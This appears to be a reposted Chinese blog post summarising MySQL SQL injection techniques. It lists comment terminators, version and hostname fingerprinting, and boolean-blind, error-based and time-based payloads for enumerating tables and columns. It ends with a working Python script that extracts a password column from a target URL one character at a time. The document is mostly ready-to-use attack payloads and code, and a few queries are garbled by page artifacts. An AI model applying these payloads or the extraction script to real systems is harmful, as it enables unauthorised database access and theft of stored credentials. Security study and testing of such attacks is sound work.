sql注入學習小結
阿新 • • 發佈:2019-01-10
sql注入小結
尾部處理小結
# |
---|
/* |
;%00 |
基礎資訊獲取小結
- sql版本資訊
AND MID(VERSION(),1,1) = ‘5’
還有一種看到的網上的大牛獲取資訊的方法
1 /!50094eaea/; False - version is equal or greater than 5.00.94
1 /!50096eaea/; True - version is lesser than 5.00.96
1 /!50095eaea/; False - version is equal to 5.00.95 - 主機名
SELECT @@hostname - 當前資料庫名,使用者名稱
select database(),user()
tips:可以用到的一些小技巧:
多個數據group_concat()或者concat()直接爆出來
資料庫資訊獲取(盲注)
- 資料庫數量
and (select count(schema_name) from information_schema limit 0,1)>=0 指定資料庫中表猜解
- AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > ‘A’
- and ascii(substr((select table_name from information_schema.tables where table_schema=%s limit %d,1),%d,1))>%d 資料庫名需要hex形式
- 基於錯誤回顯的直接蕩了
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),[email protected]) HAVING @||MIN(@:=0);
表中列數猜解
- and ascii(substr((select table_name from information_schema.tables where table_schema=0x123456 and table_name=0x123456limit %d,1),%d,1))>0
- AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),[email protected]) HAVING @||MIN(@:=0);
具體資料猜解
and ascii(substr((select password from XXX.super_user_info limit %d,1),%d,1))>%d
# -*-coding:utf-8-*-
import urllib2
import urllib
import string
import time
testpayload="http://XXX.XXX.XX/XXX.php?id=14"
payload2=" and ascii(substr((select password from XXXX.XXXXXXX limit %d,1),%d,1))>%d"
payload=" and ascii(substr((select column_name from information_schema.columns where table_schema=0xXXXXXXXX and table_name=0xXXXXXXXXXX limit %d,1),%d,1))>%d"
def GetTableName(payload,i,j,k):
finalurl = testpayload + urllib.quote(payload % (i,j,k)) + "&up_id=1"
res = urllib2.urlopen(finalurl).read()
temp = res.find("<p class=\"MsoNormal\" style=\"margin-left:0pt;text-indent:24pt;text-align:left;\">")
if temp > 0:
return True
else:
return False
def main():
for i in xrange(0, 100):
num = str(i)
charnum = 1
tmp = ''
if GetTableName(payload2, 0, charnum, 0) == False:
break
while (1):
left = 0
right = 127
mid = (left + right) / 2
if GetTableName(payload2,i,charnum,0) == False:
break
while left < right - 1:
# 如果該字串的第i個字元的ascii碼大於等於mid
if GetTableName(payload2,i,charnum,mid) == True:
# 則更新左邊界
left = mid
mid = (left + right) / 2
else:
# 否則該字串的第i個字元的ascii碼小於mid
# 則更新右邊界
right = mid
# 更新中值
mid = (left + right) / 2
print chr(left + 1)
tmp += chr(left + 1)
charnum += 1
print "column name:" + tmp
main()
一些小技巧
SELECT CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
SELECT CONCAT_WS(”, ‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
SELECT GROUP_CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);有關基於時間盲注的函式
SLEEP() MySQL 5
BENCHMARK() MySQL 4/5
example:’ - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1(‘true’)), false)) - ‘